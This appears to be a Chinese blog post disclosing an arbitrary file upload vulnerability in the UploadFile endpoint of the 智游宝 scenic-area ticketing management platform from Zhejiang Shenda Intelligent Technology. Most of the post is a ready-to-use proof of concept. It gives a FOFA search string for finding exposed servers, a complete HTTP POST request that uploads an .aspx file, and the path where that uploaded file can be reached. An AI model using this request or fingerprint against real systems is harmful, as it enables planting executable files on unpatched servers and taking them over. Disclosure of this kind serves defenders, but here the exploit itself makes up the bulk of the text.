浙江深大智能科技有限公司管控平台服务端存在任意文件上传漏洞

漏洞描述

智游宝是连接景区与分销商(OTA、旅行社)的公正、权威、可信的第三方服务平台。作为国内智慧景区第三方技术服务支撑平台,智游宝为景区提供了可控制分销商的管理环境,安全、便捷、高效地实现了电子票的生产、发送、检票、退换票以及票款回收等技术环节;为分销商提供了便捷的采购和发货渠道;为景区提供了一系列数据分析报告,辅助景区决策。浙江深大智能科技有限公司管控平台服务端UploadFile存在任意文件上传漏洞。

漏洞复现

FOFA

复制代码
body="ItemsControlServer.aspx"

POC

复制代码
POST /Launch/UploadFile?FileName=toto.aspx&Version=1&Size=100 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

2

上传后文件路径

复制代码
/Launch/Client/toto.aspx
相关推荐
QXWZ_IA8 小时前
1库1图1批是什么?千寻位置公安地图数据体系详解
科技·算法·能源·媒体·交通物流·政务
大公产经晚间消息9 小时前
《寻访独角兽》首期走进太仓,探访小科智行的硬科技“突围”
网络·人工智能·科技
JoyCong199810 小时前
ToDesk新功能科普:屏幕墙、协作模式、设备别名、USB映射...
网络·科技·电脑·远程工作·远程操作
融智兴科技13 小时前
一张校园卡学生证,如何连接学习、生活与校园管理?
大数据·科技·物联网
蓝速科技14 小时前
蓝速科技鸿蒙广告机替代安卓实测:信创系统下的性能与边界评估
android·科技·harmonyos
蓝速科技16 小时前
蓝速科技 3D 全息舱 AI 数字人校园智慧升级实效展示
人工智能·科技·3d
芯巧电子16 小时前
58. OrCAD绘制原理图时怎么放置电源、地与分页连接符号?I Cadence Allegro 电子设计 快问快答
科技·cadence·软件·allegro·orcad
Axis tech18 小时前
如何使用Xsens快速创建动作捕捉工作室
科技·机器人
爱浦路 IPLOOK19 小时前
IMS核心网建设方案:全IP时代的语音与多媒体业务统一底座
网络·分布式·科技·5g·信息与通信
m0_4665252920 小时前
公积金弹性调整:科技行业穿越周期的理性选择
大数据·人工智能·科技